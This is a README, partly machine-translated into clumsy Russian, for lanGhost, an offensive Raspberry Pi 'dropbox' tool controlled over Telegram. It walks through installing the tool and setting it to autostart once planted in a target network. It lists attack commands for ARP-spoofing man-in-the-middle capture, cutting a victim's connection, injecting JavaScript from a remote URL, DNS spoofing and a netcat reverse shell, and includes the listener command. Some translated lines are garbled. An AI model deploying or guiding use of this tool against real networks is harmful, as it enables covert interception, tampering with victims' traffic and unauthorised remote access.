Langhost предназначен для Raspberry Pis ( Raspbian / Kali для RPI ). Запуск его на других/настольных дистрибуциях может вызвать проблемы и не может работать как исключение.
Вам понадобится Raspberry Pi со свежей Raspbian/Kali на SD -карте, потому что вы не хотите, чтобы на заднем плане было ничего другого.
Загрузите PI, получите SSH продавать или подключить монитор и клавиатуру и введите эти команды:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
Пожалуйста, прочитайте вопросы/сообщения при запуске сценария настройки!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
Использование Langhost в сети, больше, чем /24 , не рекомендуется , потому что сканирование займет слишком много времени.
Лангост не тихо . Любой, кто контролирует трафик, может видеть пакеты ARP!
If you have selected yes
at step 4/4 (autostart)
the Pi is fully set up for dropping. Langhost должен запустить загрузку и отправить вам сообщение на Telegram с текстом: lanGhost started! ?
Полем
Обязательно попробуйте это в своей лаборатории и проверьте, отвечает ли Langhost на ваши сообщения!
Если вы все настроены, просто подключите его к целевой сети, подключив кабель Ethernet к PI и подключив питание через Micro USB, и вы готовы к работе!
(Langhost также может работать над Wi -Fi, но вам нужно будет настроить wpa_supplicant
для автоматического подключения к сети сначала)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
You can start an attack by using one of these commands: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
У вас есть одна или несколько атак, вы можете использовать команду /attack
, чтобы получить список из них, содержащих ATTACK-ID
.
Чтобы остановить тип атаки /stop [ATTACK-ID]
.
/reversesh
делает только соединение NetCat TCP, которое не зашифровано, и весь трафик можно контролировать! Используйте его только для экстренных исправлений или для настройки зашифрованного обратного соединения при необходимости.
Команда /reversesh
предназначена для получения обратной оболочки на PI, когда она не доступна снаружи.
Чтобы использовать команду /reversesh
вам потребуется прослушивание сервера для оболочки.
Команда NetCat запустить слушатель на вашем сервере:
$ nc -l 0.0.0.0 [PORT]
Команда телеграммы:
/reversesh [IP-of-your-listening-server] [PORT]
/kill
- останавливает интернет -подключение к цели./mitm
- захватывает HTTP и DNS -трафик из цели и отправляет его в текстовые сообщения./replaceimg
- заменяет HTTP -изображения для цели на какую картинку вы отправляете боту./injectjs
- вводит JavaScript в каждый HTTP HTML -ответ для цели. Вам нужно разместить файл JS на вашем сервере и дать URL в качестве параметра./spoofdns
- Spoofs DNS -ответы для цели.Все атаки используют ARP Spoofing !
/scan
- сканирует локальную сеть и возвращает хостов онлайн. Использует nmap -sn
сканирование для обнаружения хостов./scanip
- сканирует IP -адрес для открытых портов и другой информации. Использует nmap -sS
Scan.Вы получите сообщение каждый раз, когда новое устройство подключает/оставляет сеть.
Copyright (C) 2018 Дэвид Шюц. Некоторые права защищены.
Langhost находится в условиях лицензии MIT после всех разъяснений, указанных в файле лицензии. Вы также можете пойти дальше и написать мне по электронной почте xdavid {at} protonmail {dot} com.